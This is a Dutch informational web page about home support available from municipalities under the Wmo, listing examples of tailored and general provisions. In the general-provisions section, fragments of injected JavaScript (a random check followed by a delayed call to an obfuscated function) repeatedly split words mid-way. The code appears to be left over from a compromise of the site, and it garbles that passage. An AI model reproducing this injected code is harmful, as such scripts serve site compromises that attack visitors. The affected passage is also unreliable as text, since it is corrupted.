Welke hulp kan ik thuis krijgen van de gemeente vanuit de Wmo?

Thuishulp Gemeente WMO

Wie maatschappelijke ondersteuning nodig heeft, kan een beroep doen op de Wmo. De gemeente onderzoekt met u welke ondersteuning u nodig heeft. Dat kan een maatwerkvoorziening of een algemene voorziening zijn. Een maatwerkvoorziening is afgestemd op uw situatie, zoals aanpassingen in uw woning. Een algemene voorziening staat open voor iedereen. Bijvoorbeeld een boodschappendienst.

Welke voorziening voor ondersteuning thuis

Bent u onvoldoende zelfredzaam of kunt u niet goed meedoen in de maatschappij? En kan uw netwerk ook niet bijdragen? Dan is de gemeente verplicht ondersteuning te bieden. In de wet staat niet wat voor soort voorziening dit moet zijn. Dat kan een algemene voorziening of een maatwerkvoorziening zijn. In een onderzoek (meestal een gesprek) stelt de gemeente met u vast wat u nodig heeft. Voor sommige voorzieningen geldt een eigen bijdrage.

Maatwerkvoorziening

Een maatwerkvoorziening is geen medische hulp. Voorbeelden maatwerkvoorzieningen zijn:

 • vervoersvoorziening;
 • vervoer in de regio (voor mensen die slecht ter been zijn en niet met het openbaar vervoer kunnen reizen);
 • individuele begeleiding;
 • beschermde woonplek;
 • dagbesteding op maat;
 • ondersteuning bij het opzetten van een planning;
 • huishoudelijke hulp (zoals hulp bij het opruimen, schoonmaken en ramen zemen).

Algemene voorziening

Soms bent u geholpen met een zogenaamde ‘algemene voorziening’. Een algemene voorziening is vrij toegankelijk, zonder voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and onderzoek naar uw persoonlijke omstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andigheden. Voorbeelden van algemene voorzieningen zijn:

 • boodschappendienst;
 • het advies- en meldpunt huiselijk geweld en kindermishandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeling;
 • een ontmoetingsruimte voor mensen die eenzaam zijn;
 • maaltijdverzorging (ook wel warme maaltijdvoorziening of tafeltje-dekje genoemd);
 • maatschappelijke opvang (bijvoorbeeld blijf-van-mijn-lijfhuizen en daklozenopvang);